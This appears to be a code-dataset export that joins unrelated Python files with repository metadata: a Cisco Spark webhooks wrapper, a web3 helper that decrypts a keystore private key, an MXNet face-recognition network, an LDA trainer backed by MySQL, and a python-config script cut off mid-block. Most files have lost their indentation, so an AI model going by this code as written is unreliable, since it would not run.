Python
| false | false | 9,321 |
py
|
"""Cisco Spark Webhooks-API wrapper classes.
Classes:
Webhook: Models a Spark 'webhook' JSON object as a native Python object.
WebhooksAPI: Wraps the Cisco Spark Webhooks-API and exposes the API
calls as Python method calls that return native Python objects.
"""
from ciscosparkapi.exceptions import ciscosparkapiException
from ciscosparkapi.helper import utf8, generator_container
from ciscosparkapi.restsession import RestSession
from ciscosparkapi.sparkdata import SparkData
class Webhook(SparkData):
"""Model a Spark 'webhook' JSON object as a native Python object."""
def __init__(self, json):
"""Init a new Webhook data object from a JSON dictionary or string.
Args:
json(dict, unicode, str): Input JSON object.
Raises:
TypeError: If the input object is not a dictionary or string.
"""
super(Webhook, self).__init__(json)
@property
def id(self):
"""Webhook ID."""
return self._json.get(u'id')
@property
def name(self):
"""A user-friendly name for this webhook."""
return self._json.get(u'name')
@property
def targetUrl(self):
"""The URL that receives POST requests for each event."""
return self._json.get(u'targetUrl')
@property
def resource(self):
"""The resource type for the webhook."""
return self._json.get(u'resource')
@property
def event(self):
"""The event type for the webhook."""
return self._json.get(u'event')
@property
def filter(self):
"""The filter that defines the webhook scope."""
return self._json.get(u'filter')
@property
def secret(self):
"""Secret used to generate payload signature."""
return self._json.get(u'secret')
@property
def created(self):
"""Creation date and time in ISO8601 format."""
return self._json.get(u'created')
@property
def data(self):
"""The object representation of the resource triggering the webhook.
The data property contains the object representation of the resource
that triggered the webhook. For example, if you registered a webhook
that triggers when messages are created (i.e. posted into a room) then
the data property will contain the representation for a message
resource, as specified in the Messages API documentation.
"""
object_data = self._json.get(u'data', None)
if object_data:
return SparkData(object_data)
else:
return None
class WebhooksAPI(object):
"""Cisco Spark Webhooks-API wrapper class.
Wraps the Cisco Spark Webhooks-API and exposes the API calls as Python
method calls that return native Python objects.
Attributes:
session(RestSession): The RESTful session object to be used for API
calls to the Cisco Spark service.
"""
def __init__(self, session):
"""Init a new WebhooksAPI object with the provided RestSession.
Args:
session(RestSession): The RESTful session object to be used for
API calls to the Cisco Spark service.
Raises:
AssertionError: If the parameter types are incorrect.
"""
assert isinstance(session, RestSession)
super(WebhooksAPI, self).__init__()
self.session = session
@generator_container
def list(self, max=None):
"""List all of the authenticated user's webhooks.
This method supports Cisco Spark's implementation of RFC5988 Web
Linking to provide pagination support. It returns a generator
container that incrementally yields all webhooks returned by the
query. The generator will automatically request additional 'pages' of
responses from Spark as needed until all responses have been returned.
The container makes the generator safe for reuse. A new API call will
be made, using the same parameters that were specified when the
generator was created, every time a new iterator is requested from the
container.
Args:
max(int): Limits the maximum number of webhooks returned from the
Spark service per request.
Yields:
Webhook: The next webhook from the Cisco Spark query.
Raises:
AssertionError: If the parameter types are incorrect.
SparkApiError: If the Cisco Spark cloud returns an error.
"""
# Process args
assert max is None or isinstance(max, int)
params = {}
if max:
params[u'max'] = max
# API request - get items
items = self.session.get_items('webhooks', params=params)
# Yield Webhook objects created from the returned items JSON objects
for item in items:
yield Webhook(item)
def create(self, name, targetUrl, resource, event,
filter=None, secret=None):
"""Create a webhook.
Args:
name(unicode, str): A user-friendly name for this webhook.
targetUrl(unicode, str): The URL that receives POST requests for
each event.
resource(unicode, str): The resource type for the webhook.
event(unicode, str): The event type for the webhook.
filter(unicode, str): The filter that defines the webhook scope.
secret(unicode, str): secret used to generate payload signature.
Returns:
Webhook: With the details of the created webhook.
Raises:
AssertionError: If the parameter types are incorrect.
SparkApiError: If the Cisco Spark cloud returns an error.
"""
# Process args
assert isinstance(name, basestring)
assert isinstance(targetUrl, basestring)
assert isinstance(resource, basestring)
assert isinstance(event, basestring)
assert filter is None or isinstance(filter, basestring)
assert secret is None or isinstance(secret, basestring)
post_data = {}
post_data[u'name'] = utf8(name)
post_data[u'targetUrl'] = utf8(targetUrl)
post_data[u'resource'] = utf8(resource)
post_data[u'event'] = utf8(event)
if filter:
post_data[u'filter'] = utf8(filter)
if secret:
post_data[u'secret'] = utf8(secret)
# API request
json_obj = self.session.post('webhooks', json=post_data)
# Return a Webhook object created from the response JSON data
return Webhook(json_obj)
def get(self, webhookId):
"""Get the details of a webhook, by ID.
Args:
webhookId(unicode, str): The webhookId of the webhook.
Returns:
Webhook: With the details of the requested webhook.
Raises:
AssertionError: If the parameter types are incorrect.
SparkApiError: If the Cisco Spark cloud returns an error.
"""
# Process args
assert isinstance(webhookId, basestring)
# API request
json_obj = self.session.get('webhooks/' + webhookId)
# Return a Webhook object created from the response JSON data
return Webhook(json_obj)
def update(self, webhookId, **update_attributes):
"""Update details for a webhook.
Args:
webhookId(unicode, str): The webhookId of the webhook to be
updated.
**update_attributes:
name(unicode, str): A user-friendly name for this webhook.
targetUrl(unicode, str): The URL that receives POST requests
for each event.
Returns:
Webhook: With the updated Spark webhook details.
Raises:
AssertionError: If the parameter types are incorrect.
ciscosparkapiException: If an update attribute is not provided.
SparkApiError: If the Cisco Spark cloud returns an error.
"""
# Process args
assert isinstance(webhookId, basestring)
# Process update_attributes keyword arguments
if not update_attributes:
error_message = "At least one **update_attributes keyword " \
"argument must be specified."
raise ciscosparkapiException(error_message)
put_data = {}
for param, value in update_attributes.items():
if isinstance(value, basestring):
value = utf8(value)
put_data[utf8(param)] = value
# API request
json_obj = self.session.put('webhooks/' + webhookId, json=put_data)
# Return a Webhook object created from the response JSON data
return Webhook(json_obj)
def delete(self, webhookId):
"""Delete a webhook.
Args:
webhookId(unicode, str): The webhookId of the webhook to be
deleted.
Raises:
AssertionError: If the parameter types are incorrect.
SparkApiError: If the Cisco Spark cloud returns an error.
"""
# Process args
assert isinstance(webhookId, basestring)
# API request
self.session.delete('webhooks/' + webhookId)
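# Minimal usage sketch (assumes a RestSession has already been constructed,
# e.g. by the package's top-level API object, which is not shown in this module):
#
#   webhooks = WebhooksAPI(session)
#   hook = webhooks.create('my hook', 'https://example.com/events',
#                          'messages', 'created')
#   for wh in webhooks.list(max=50):
#       print(wh.name, wh.targetUrl)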
|
[
"chris@cmlccie.com"
] |
chris@cmlccie.com
|
97fa245b8f83144765ac2371741ea382a277a586
|
bc69172516abbad11a53022a13efff54d3f361c0
|
/utils/app.py
|
5c203783bebe0220039a8a0ba8373386218ed05a
|
[] |
no_license
|
abrance/MedicalLeagueChain
|
8501ad5fc4110bbffc1a112a1264da793662ea24
|
61961e95bcee3f55868e2e2265e9f86c843a4500
|
refs/heads/master
| 2023-01-24T21:15:50.022300 | 2020-12-08T05:51:22 | 2020-12-08T05:51:22 | 291,379,314 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,122 |
py
|
import json
from constants import user
from utils.api import w3
from utils.log import logger, log_path
import datetime
"""
This module exposes the web3 IPC interface.
"""
class EthInit(object):
def __init__(self):
self.log = {}
def commit(self, method, param, ret):
t = datetime.datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
self.log[method] = [t, param, ret]
logger.info(ret)
def __del__(self):
t = datetime.datetime.now().strftime('%Y-%m-%d_%H:%M:%S')
with open('{}/{}.info'.format(log_path, t), 'a+') as f:
f.write(json.dumps(self.log, indent=4))
def is_address(self, param):
ret = w3.isAddress(param)
self.commit('is_address', param, ret)
return ret
def get_balance(self, param):
account = param
ret = w3.eth.getBalance(account)
self.commit('get_balance', param, ret)
return ret
def keccak(self, param):
# Replacement for the old sha method
# >> > Web3.keccak(0x747874)
# >> > Web3.keccak(b'\x74\x78\x74')
# >> > Web3.keccak(hexstr='0x747874')
# >> > Web3.keccak(hexstr='747874')
# >> > Web3.keccak(text='txt')
if type(param) is dict:
ret = w3.keccak(**param)
else:
ret = w3.keccak(param)
self.commit('keccak', param, ret)
return ret
def unlock(self, account, passphrase):
param = (account, passphrase)
ret = w3.geth.personal.unlock_account(account, passphrase)
self.commit('unlock', param, ret)
return ret
@staticmethod
def get_private_key(key_store_file_path, passphrase):
# 2020/12/8: decrypt the keystore file and return the private key as hex
with open(key_store_file_path, "r") as file:
    encrypted_key = file.read()
p_key = w3.eth.account.decrypt(encrypted_key, passphrase)
import binascii
p_key = binascii.b2a_hex(p_key).decode('ascii')  # hex string without the b'' wrapper
return p_key
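# get_private_key usage sketch (hypothetical keystore path and passphrase):
#
#   key_hex = EthInit.get_private_key('/path/to/keystore.json', 'my-passphrase')
#   print(key_hex)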
if __name__ == '__main__':
a = EthInit()
# a.is_address('0x2cc7fc9f579fd5fed62633548b2ca11bd029f779')
# a.get_balance(user)
# a.keccak()
del a
|
[
"your_email"
] |
your_email
|
f1a9777ec7e33129540ca8a03f8921fd33f2f177
|
94d101ae081c95e3f02fb0a4cabf6b189102a647
|
/env/slurm/examples/tensorflow/example.py
|
b08f48ef4d0cc51f0a045d84c1779bd4fa4db957
|
[] |
no_license
|
sk-unikent/icarus-scripts
|
06ead6cee3628af06ed3e9075905b9396502c7f8
|
e20c2ebcec0df38bc07d032e77412b8ba5dd8c5f
|
refs/heads/master
| 2021-04-27T06:05:57.613400 | 2018-10-02T06:59:45 | 2018-10-02T06:59:45 | 122,606,951 | 0 | 0 | null | 2018-10-02T06:59:46 | 2018-02-23T10:26:50 |
Python
|
UTF-8
|
Python
| false | false | 149 |
py
|
#
# Example Tensorflow Application
#
import tensorflow as tf
hello = tf.constant('Hello, TensorFlow!')
sess = tf.Session()
print(sess.run(hello))
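# Note: this uses the TensorFlow 1.x graph/session API. Under TensorFlow 2.x
# (if installed) the eager equivalent would simply be:
#
#   import tensorflow as tf
#   print(tf.constant('Hello, TensorFlow!'))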
|
[
"s.kelty@kent.ac.uk"
] |
s.kelty@kent.ac.uk
|
25ad96ae411bfd41662e4433ed36402bfc972d03
|
41aafc48b866158953c1af454ad0c9b33f1319c3
|
/symbol/fspherenet.py
|
aa275ff12772d65dac29c386b84ea80381017c68
|
[] |
no_license
|
myknotruby/recognition
|
a1f9a2defabb416091da64b87b8419c8a7f0312a
|
6c20026d5b226ce6e7fd580a408ff11b7f56158e
|
refs/heads/master
| 2022-11-16T23:07:07.158119 | 2020-07-02T02:14:15 | 2020-07-02T02:14:15 | 272,152,804 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 11,034 |
py
|
import os, sys
import mxnet as mx
import numpy as np
import math
#from mxnet.base import _Null
import symbol_utils
sys.path.append(os.path.join(os.path.dirname(__file__), '..'))
from config import config
withBN = True
bn_mom = 0.9
def conv_branch_pool(data, units, filters, workspace):
body = data
#body = mx.sym.Convolution(data=body, no_bias=False, num_filter=32, kernel=(5, 5), stride=(2,2), pad=(2, 2),
body = mx.sym.Convolution(data=body, no_bias=False, num_filter=24, kernel=(3, 3), stride=(1,1), pad=(1, 1),
name= "conv%d_%d"%(0, 1), workspace=workspace)
if withBN:
bn = mx.sym.BatchNorm(data=body, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=("bn%d_%d" % (0, 1)))
body = mx.sym.LeakyReLU(data=bn, act_type='leaky', name="relu%d_%d" % (0, 1))
else:
body = mx.sym.LeakyReLU(data = body, act_type='prelu', name = "relu%d_%d" % (0, 1))
for i in range(len(units)):
f = filters[i]
idx = 1
if i>=1:
_weight = mx.symbol.Variable("conv%d_%d_weight"%(i+1, idx), lr_mult=1.0)
_bias = mx.symbol.Variable("conv%d_%d_bias"%(i+1, idx), lr_mult=2.0, wd_mult=0.0)
body1 = mx.sym.Convolution(data=body, weight = _weight, bias = _bias, num_filter=f, kernel=(3, 3), stride=(2,2), pad=(1, 1),
name= "conv%d_%d"%(i+1, idx), workspace=workspace)
if withBN:
bn = mx.sym.BatchNorm(data=body1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=("bn%d_%d" % (i+1, idx)))
#body1 = mx.sym.LeakyReLU(data=bn, act_type='leaky', name="relu%d_%d" % (i+1, idx))
body1 = mx.sym.Activation(data=bn, act_type='relu', name="relu%d_%d" % (i+1, idx))
else:
body1 = mx.sym.LeakyReLU(data = body1, act_type='prelu', name = "relu%d_%d" % (i+1, idx))
idx += 1
_weight = mx.symbol.Variable("conv%d_%d_weight"%(i+1, idx), lr_mult=1.0)
_bias = mx.symbol.Variable("conv%d_%d_bias"%(i+1, idx), lr_mult=2.0, wd_mult=0.0)
body1 = mx.sym.Convolution(data=body1, weight=_weight, bias=_bias, num_filter=f, kernel=(3, 3), stride=(1,1), pad=(1, 1),
name= "conv%d_%d"%(i+1, idx), workspace=workspace)
if withBN:
body1 = mx.sym.BatchNorm(data=body1, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=("bn%d_%d" % (i+1, idx)))
##body1 = mx.sym.LeakyReLU(data=bn, act_type='relu', name="relu%d_%d" % (i+1, idx))
else:
body1 = mx.sym.LeakyReLU(data = body1, act_type='prelu', name = "relu%d_%d" % (i+1, idx))
idx += 1
body = mx.sym.Pooling(data = body, global_pool=False, kernel=(2,2), stride=(2,2),pool_type='avg', pooling_convention='full',name='pool%d_%d'%(i+1, idx))
idx += 1
_weight = mx.symbol.Variable("conv%d_%d_weight"%(i+1, idx), lr_mult=1.0)
_bias = mx.symbol.Variable("conv%d_%d_bias"%(i+1, idx), lr_mult=2.0, wd_mult=0.0)
body = mx.sym.Convolution(data=body, weight=_weight, bias=_bias, num_filter=f, kernel=(1, 1), stride=(1, 1), pad=(0, 0),
name= "conv%d_%d"%(i+1, idx), workspace=workspace)
if withBN:
body = mx.sym.BatchNorm(data=body, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=("bn%d_%d" % (i+1, idx)))
##body = mx.sym.LeakyReLU(data=bn, act_type='relu', name="relu%d_%d" % (i+1, idx))
else:
body = mx.sym.LeakyReLU(data = body, act_type='prelu', name = "relu%d_%d" % (i+1, idx))
body = body1 + body
idx += 1
for j in range(units[i]):
_body = mx.sym.Convolution(data=body, no_bias=True, num_filter=f, kernel=(3, 3), stride=(1,1), pad=(1, 1),
name= "conv%d_%d"%(i+1, idx), workspace=workspace)
if withBN:
bn = mx.sym.BatchNorm(data=_body, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=("bn%d_%d" % (i+1, idx)))
#_body = mx.sym.LeakyReLU(data=bn, act_type='leaky', name="relu%d_%d" % (i+1, idx))
_body = mx.sym.Activation(data=bn, act_type='relu', name="relu%d_%d" % (i+1, idx))
else:
_body = mx.sym.LeakyReLU(data = _body, act_type='prelu', name = "relu%d_%d" % (i+1, idx))
idx+=1
_body = mx.sym.Convolution(data=_body, no_bias=True, num_filter=f, kernel=(3, 3), stride=(1,1), pad=(1, 1),
name= "conv%d_%d"%(i+1, idx), workspace=workspace)
if withBN:
_body = mx.sym.BatchNorm(data=_body, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=("bn%d_%d" % (i+1, idx)))
##_body = mx.sym.LeakyReLU(data=bn, act_type='relu', name="relu%d_%d" % (i+1, idx))
else:
_body = mx.sym.LeakyReLU(data = _body, act_type='prelu', name = "relu%d_%d" % (i+1, idx))
idx+=1
body = body+_body
node = len(units)+1
body = mx.sym.Convolution(data=body, no_bias=False, num_filter=512, kernel=(1, 1), stride=(1,1), pad=(0, 0),
name= "conv%d_%d"%(node, 1), workspace=workspace)
if withBN:
bn = mx.sym.BatchNorm(data=body, fix_gamma=False, eps=2e-5, momentum=bn_mom, name=("bn%d_%d" % (node, idx)))
#body = mx.sym.LeakyReLU(data=bn, act_type='leaky', name="relu%d_%d" % (node, idx))
body = mx.sym.Activation(data=bn, act_type='relu', name="relu%d_%d" % (node, idx))
else:
body = mx.sym.LeakyReLU(data = body, act_type='prelu', name = "relu%d_%d" % (node, idx))
#import pdb; pdb.set_trace()
return body
def conv_main(data, units, filters, workspace):
body = data
body = mx.sym.Convolution(data=body, no_bias=True, num_filter=32, kernel=(3, 3), stride=(1,1), pad=(1, 1),
name= "conv%d_%d"%(0, 1), workspace=workspace)
body = mx.sym.LeakyReLU(data = body, act_type='prelu', name = "relu%d_%d" % (0, 1))
for i in range(len(units)):
f = filters[i]
idx = 1
_weight = mx.symbol.Variable("conv%d_%d_weight"%(i+1, idx), lr_mult=1.0)
_bias = mx.symbol.Variable("conv%d_%d_bias"%(i+1, idx), lr_mult=2.0, wd_mult=0.0)
body1 = mx.sym.Convolution(data=body, weight = _weight, bias = _bias, num_filter=f, kernel=(3, 3), stride=(2,2), pad=(1, 1),
name= "conv%d_%d"%(i+1, idx), workspace=workspace)
body1 = mx.sym.LeakyReLU(data = body1, act_type='prelu', name = "relu%d_%d" % (i+1, idx))
idx += 1
_weight = mx.symbol.Variable("conv%d_%d_weight"%(i+1, idx), lr_mult=1.0)
_bias = mx.symbol.Variable("conv%d_%d_bias"%(i+1, idx), lr_mult=2.0, wd_mult=0.0)
body1 = mx.sym.Convolution(data=body1, weight=_weight, bias=_bias, num_filter=f, kernel=(3, 3), stride=(1,1), pad=(1, 1),
name= "conv%d_%d"%(i+1, idx), workspace=workspace)
body1 = mx.sym.LeakyReLU(data = body1, act_type='prelu', name = "relu%d_%d" % (i+1, idx))
idx += 1
body = mx.sym.Pooling(data = body, global_pool=False, kernel=(2,2), stride=(2,2),pool_type='avg', pooling_convention='full', name='pool%d_%d'%(i+1, idx))
idx += 1
_weight = mx.symbol.Variable("conv%d_%d_weight"%(i+1, idx), lr_mult=1.0)
_bias = mx.symbol.Variable("conv%d_%d_bias"%(i+1, idx), lr_mult=2.0, wd_mult=0.0)
body = mx.sym.Convolution(data=body, weight=_weight, bias=_bias, num_filter=f, kernel=(1, 1), stride=(1,1), pad=(0, 0),
name= "conv%d_%d"%(i+1, idx), workspace=workspace)
body = mx.sym.LeakyReLU(data = body, act_type='prelu', name = "relu%d_%d" % (i+1, idx))
body = body1 + body
idx += 1
for j in range(units[i]):
_body = mx.sym.Convolution(data=body, no_bias=True, num_filter=f, kernel=(3, 3), stride=(1,1), pad=(1, 1),
name= "conv%d_%d"%(i+1, idx), workspace=workspace)
_body = mx.sym.LeakyReLU(data = _body, act_type='prelu', name = "relu%d_%d" % (i+1, idx))
idx+=1
_body = mx.sym.Convolution(data=_body, no_bias=True, num_filter=f, kernel=(3, 3), stride=(1,1), pad=(1, 1),
name= "conv%d_%d"%(i+1, idx), workspace=workspace)
_body = mx.sym.LeakyReLU(data = _body, act_type='prelu', name = "relu%d_%d" % (i+1, idx))
idx+=1
body = body+_body
return body
def get_symbol():
_dtype = config.dtype
num_classes = config.emb_size
fc_type = 'E' #config.net_output
workspace = config.workspace
num_layers = config.num_layers
if num_layers==64:
units = [3,8,16,3]
filters = [64,128,256,512]
elif num_layers==20:
units = [1,2,4,1]
filters = [64,128,256,512]
#filters = [64, 256, 512, 1024]
elif num_layers==36:
units = [2,4,8,2]
filters = [64,128,256,512]
#filters = [64, 256, 512, 1024]
elif num_layers==44:
units = [3,4,4,4,3]
filters = [16,32,64,128,256]
elif num_layers==60:
units = [3,8,14,3]
filters = [64,128,256,512]
elif num_layers==68:
units = [3,4,8,12,3]
filters = [16,32,64,128,256]
elif num_layers==74:
units = [3,6,8,12,3]
filters = [24,32,64,128,256]
#filters = [32,64,128,256,256]
elif num_layers==104:
units = [3,8,36,3]
filters = [64,128,256,512]
#filters = [64, 256, 512, 1024]
data = mx.symbol.Variable('data')
data = data-127.5
data = data*0.0078125
if _dtype == 'float16':
data = mx.sym.Cast(data, dtype=np.float16)
body = None
if num_layers==44 or num_layers==68 or num_layers==74:
body = conv_branch_pool(data = data, units = units, filters = filters, workspace = workspace)
else:
body = conv_main(data = data, units = units, filters = filters, workspace = workspace)
#_weight = mx.symbol.Variable("fc1_weight", lr_mult=1.0)
#_bias = mx.symbol.Variable("fc1_bias", lr_mult=2.0, wd_mult=0.0)
#fc1 = mx.sym.FullyConnected(data=body, weight=_weight, bias=_bias, num_hidden=num_classes, name='fc1')
if _dtype == 'float16':
body = mx.sym.Cast(body, dtype=np.float16)
fc1 = symbol_utils.get_fc1(body, num_classes, fc_type)
if _dtype == 'float16':
fc1 = mx.sym.Cast(fc1, dtype=np.float32)
#fc1 = mx.sym.Pooling(data = body, global_pool=True, kernel=(2,2), stride=(2,2),pool_type='avg', pooling_convention='full', name='pool_fc1')
return fc1
def init_weights(sym, data_shape_dict, num_layers):
arg_name = sym.list_arguments()
aux_name = sym.list_auxiliary_states()
arg_shape, aaa, aux_shape = sym.infer_shape(**data_shape_dict)
#print(data_shape_dict)
#print(arg_name)
#print(arg_shape)
arg_params = {}
aux_params = None
#print(aaa)
#print(aux_shape)
arg_shape_dict = dict(zip(arg_name, arg_shape))
aux_shape_dict = dict(zip(aux_name, aux_shape))
#print(aux_shape)
#print(aux_params)
#print(arg_shape_dict)
for k, v in arg_shape_dict.items():
if k.startswith('conv') and k.endswith('_weight'):
if not k.find('_1_')>=0:
if num_layers<100:
arg_params[k] = mx.random.normal(0, 0.01, shape=v)
print('init', k)
if k.endswith('_bias'):
arg_params[k] = mx.nd.zeros(shape=v)
print('init', k)
return arg_params, aux_params
|
[
"zhzhaoliang@126.com"
] |
zhzhaoliang@126.com
|
606a16df0456b41332cf3ba90a58e11843c23db5
|
dcc2aca1755516c165f8fc5d3e0bcaac96ddbac6
|
/LDA/LDA_Train.py
|
0476f09897774296705c0f29156a204f2d980a3b
|
[] |
no_license
|
maurercartan/GIGABYTE_FuzzyQuery
|
4fb97c859b293f6cf14e6c8bfad8f81479116568
|
83e8035e37bb7e028dea9740f6b26e1ab94f2a1b
|
refs/heads/master
| 2021-03-01T10:16:12.566919 | 2020-03-08T14:38:56 | 2020-03-08T14:38:56 | 245,776,815 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 6,371 |
py
|
__author__ = 'user'
from gensim import corpora, models
import jieba
import os
import configparser
import pickle
import pymysql
import pymysql.cursors
def getCorpus(dbHost,dbUser,dbPassword,dbDatabase,dbTable):
# Load the supporting file contents (config, stop words, user dictionary)
config = configparser.ConfigParser()
myINI = os.getcwd()+'\\LDA\\dict.ini'
config.read(myINI,encoding='utf-8')
stopword = os.getcwd()+"\\LDA\\stop_words.txt"
lowFreq = os.getcwd()+"\\LDA\\lowFrequency.txt"
userDefine = os.getcwd()+"\\LDA\\user_define.txt"
courses_name = []
texts_stemmed = []
stopwordList = open(stopword,'r',encoding='utf-8').readlines()[0].split(',')
userDefineList = open(userDefine,'r',encoding='utf-8').readlines()[0].split(',')
symbol = ['+','-','*','/','\\','=','_','(',')','&','^','.','%','$','#','@','!','`','~','+','-','*','/','\','=','_','(',')','&','︿','.',',','%','$','#','@','!','‵','~','\'','"','’',',',' ',' ','’','"','\r\n']  # half-width and full-width punctuation to strip
# Register the user-defined vocabulary with jieba
for item in userDefineList:
jieba.add_word(item,999999)
connStr = pymysql.connect(host=dbHost,
user=dbUser,
password=dbPassword,
db=dbDatabase,
charset='utf8mb4',
cursorclass=pymysql.cursors.DictCursor)
conn = connStr.cursor()
sql = 'select id,name,text,dir_path from '+dbTable+' where isNew=\'1\';'
conn.execute(sql)
for row in conn:
courses_name.append(row['dir_path']+'/'+row['name'])
# Read the document text
document = row['text'].lower()
# Jieba word segmentation (stop words and punctuation filtered below)
myJ = jieba.cut(document)
new_doc = {}  # the document's token-count dict
# print("id = ",row['id'])
if row['name']!="":
if "id_"+str(row['id']) not in config.sections(): config.add_section("id_"+str(row['id']))
for word in myJ:
word = noSymbo(word,symbol)
if not word in stopwordList \
and not word.isnumeric()\
and len(word)>1:
if word in new_doc.keys():
new_doc[word] += 1
else:
new_doc[word] = 1
for word in new_doc.keys():
config.set("id_"+str(row['id']),word,str(new_doc[word]))
config.write(open(myINI, 'w',encoding='utf-8'))
texts_stemmed.append(new_doc)
conn.close()
conn_2 = connStr.cursor()
sql_2 = "UPDATE info SET isNew = '0' WHERE isNew = '1'"
conn_2.execute(sql_2)
connStr.commit()
conn_2.close()
connStr.close()
# Merge the per-document dictionaries
from collections import Counter
all_stems = {}
for item in texts_stemmed:
all_stems = dict(Counter(all_stems)+Counter(item))
# Collect low-frequency words (frequency == 1)
for item in all_stems.keys():
if all_stems[item]==1:
with open(lowFreq,'a',encoding='utf-8') as f:
f.write(item+",")
def Training(numTopic=100):
import time
start = time.time()
print("***預處理***")
lowFreq = os.getcwd()+"\\LDA\\lowFrequency.txt"
stems_once = []
f = open(lowFreq,'r',encoding='utf-8')
for item in f.readlines()[0].split(','):
try:
# print(item)
stems_once.append(item)
except:
pass
f.close()
# Drop low-frequency words (removed when frequency == 1)
config = configparser.ConfigParser()
myINI = os.getcwd()+'\\LDA\\dict.ini'
config.read(myINI,encoding='utf-8')
texts = []
courses_id = []
for section in config.sections():
myID = section.replace("id_","")
print(myID)
courses_id.append(myID)
myList = []
for key in config.options(section):
if key not in stems_once:
for i in range(int(config.get(section,key))):
myList.append(key)
texts.append(myList)
print("***花費秒數 = ",round(start-time.time(),5),"***")
print("***訓練LDA模型***")
start = time.time()
# 訓練LDA模型(topic=100)
lda_path = os.getcwd()+'\\LDA\\lda.pkl'
lda_name = os.getcwd()+'\\LDA\\name.pkl'
lda_corpus = os.getcwd()+'\\LDA\\corpus.pkl'
print("***建立詞袋***")
# 建立詞袋
dictionary = corpora.Dictionary(texts)
print("***花費秒數 = ",round(time.time()-start,5),"***")
print("***建立文檔矩陣***")
# 建立文檔矩陣
corpus = [dictionary.doc2bow(text) for text in texts]
print("***花費秒數 = ",round(time.time()-start,5),"***")
print("***計算TF-IDF***")
# 計算TF-IDF
tfidf = models.TfidfModel(corpus)
corpus_tfidf = tfidf[corpus]
lda = models.LdaModel(corpus_tfidf,
id2word=dictionary,
num_topics=numTopic,
gamma_threshold=0.0001,
iterations=1000,
passes=1)
print("***花費秒數 = ",round(time.time()-start,5),"***")
with open(lda_path, 'wb') as f:
pickle.dump(lda, f, pickle.HIGHEST_PROTOCOL)
with open(lda_name, 'wb') as f:
pickle.dump(courses_id, f, pickle.HIGHEST_PROTOCOL)
with open(lda_corpus, 'wb') as f:
pickle.dump(corpus, f, pickle.HIGHEST_PROTOCOL)
print("***訓練完成***")
def noSymbo(word,symbol):
for item in symbol:
while(str(word).__contains__(item)): word = word.replace(item,"")
return word
def main():
config_path = os.getcwd()+'\\config.cfg'
config = configparser.ConfigParser()
config.read(config_path)
dbHost = config.get('ARGUMENT', 'HOST').strip('"')
dbUser = config.get('ARGUMENT', 'USER').strip('"')
dbPassword = config.get('ARGUMENT', 'PASSWORD').strip('"')
dbDatabase = config.get('ARGUMENT', 'DATABASE_NAME').strip('"')
dbTable = config.get('ARGUMENT', 'DATABASE_TABLE').strip('"')
numTopic = int(config.get('ARGUMENT', 'NUM_TOPIC').strip('"'))  # gensim expects an int
getCorpus(dbHost,dbUser,dbPassword,dbDatabase,dbTable)
Training(numTopic)
if __name__ == "__main__":
main()
|
[
"noreply@github.com"
] |
maurercartan.noreply@github.com
|
10de3e566c9cad31ae3f3f9601990deb0378c7c4
|
f19e8b0c8c5ff38c6bbfce16c6d2ee976c964ffe
|
/tests/wpt/something.py
|
10d52a0c04684fa7ff5b88cee8ec4b7fbe0bbb02
|
[] |
no_license
|
jdm/servo-mock
|
2d5fcffe5781846911844be103b1da3e9177e557
|
a52e82dffac424376031eb8bb5e7129c80eb0dea
|
refs/heads/master
| 2021-04-09T15:07:13.742809 | 2018-03-16T20:36:22 | 2018-03-16T20:36:22 | 125,684,927 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 31 |
py
|
print('this is a python file')
|
[
"josh@joshmatthews.net"
] |
josh@joshmatthews.net
|
e346a931953ea62760ea6dc50e3a102aa937f7cd
|
bf5fd174005c08cc5b616165c2f4f6dc23e4510c
|
/bin/python-config
|
b9211a3f94fc6ca0a85a6904d914769311a784b3
|
[] |
no_license
|
adnanjam/gpa
|
805b204c5b4adf3f6fa09ec19cea84c0925fb484
|
b0fe0931153dea242618c0e635473057e3bf07de
|
refs/heads/master
| 2021-03-13T17:59:13.917922 | 2020-12-21T10:08:50 | 2020-12-21T10:08:50 | 246,698,109 | 0 | 1 | null | 2020-12-21T10:08:52 | 2020-03-11T23:08:56 |
Python
|
UTF-8
|
Python
| false | false | 2,342 |
#!/home/adnan/projects/gpa/bin/python
import sys
import getopt
import sysconfig
valid_opts = ['prefix', 'exec-prefix', 'includes', 'libs', 'cflags',
'ldflags', 'help']
if sys.version_info >= (3, 2):
valid_opts.insert(-1, 'extension-suffix')
valid_opts.append('abiflags')
if sys.version_info >= (3, 3):
valid_opts.append('configdir')
def exit_with_usage(code=1):
sys.stderr.write("Usage: {0} [{1}]\n".format(
sys.argv[0], '|'.join('--'+opt for opt in valid_opts)))
sys.exit(code)
try:
opts, args = getopt.getopt(sys.argv[1:], '', valid_opts)
except getopt.error:
exit_with_usage()
if not opts:
exit_with_usage()
pyver = sysconfig.get_config_var('VERSION')
getvar = sysconfig.get_config_var
opt_flags = [flag for (flag, val) in opts]
if '--help' in opt_flags:
exit_with_usage(code=0)
for opt in opt_flags:
if opt == '--prefix':
print(sysconfig.get_config_var('prefix'))
elif opt == '--exec-prefix':
print(sysconfig.get_config_var('exec_prefix'))
elif opt in ('--includes', '--cflags'):
flags = ['-I' + sysconfig.get_path('include'),
'-I' + sysconfig.get_path('platinclude')]
if opt == '--cflags':
flags.extend(getvar('CFLAGS').split())
print(' '.join(flags))
elif opt in ('--libs', '--ldflags'):
abiflags = getattr(sys, 'abiflags', '')
libs = ['-lpython' + pyver + abiflags]
libs += getvar('LIBS').split()
libs += getvar('SYSLIBS').split()
# add the prefix/lib/pythonX.Y/config dir, but only if there is no
# shared library in prefix/lib/.
if opt == '--ldflags':
if not getvar('Py_ENABLE_SHARED'):
libs.insert(0, '-L' + getvar('LIBPL'))
if not getvar('PYTHONFRAMEWORK'):
libs.extend(getvar('LINKFORSHARED').split())
print(' '.join(libs))
elif opt == '--extension-suffix':
ext_suffix = sysconfig.get_config_var('EXT_SUFFIX')
if ext_suffix is None:
ext_suffix = sysconfig.get_config_var('SO')
print(ext_suffix)
elif opt == '--abiflags':
if not getattr(sys, 'abiflags', None):
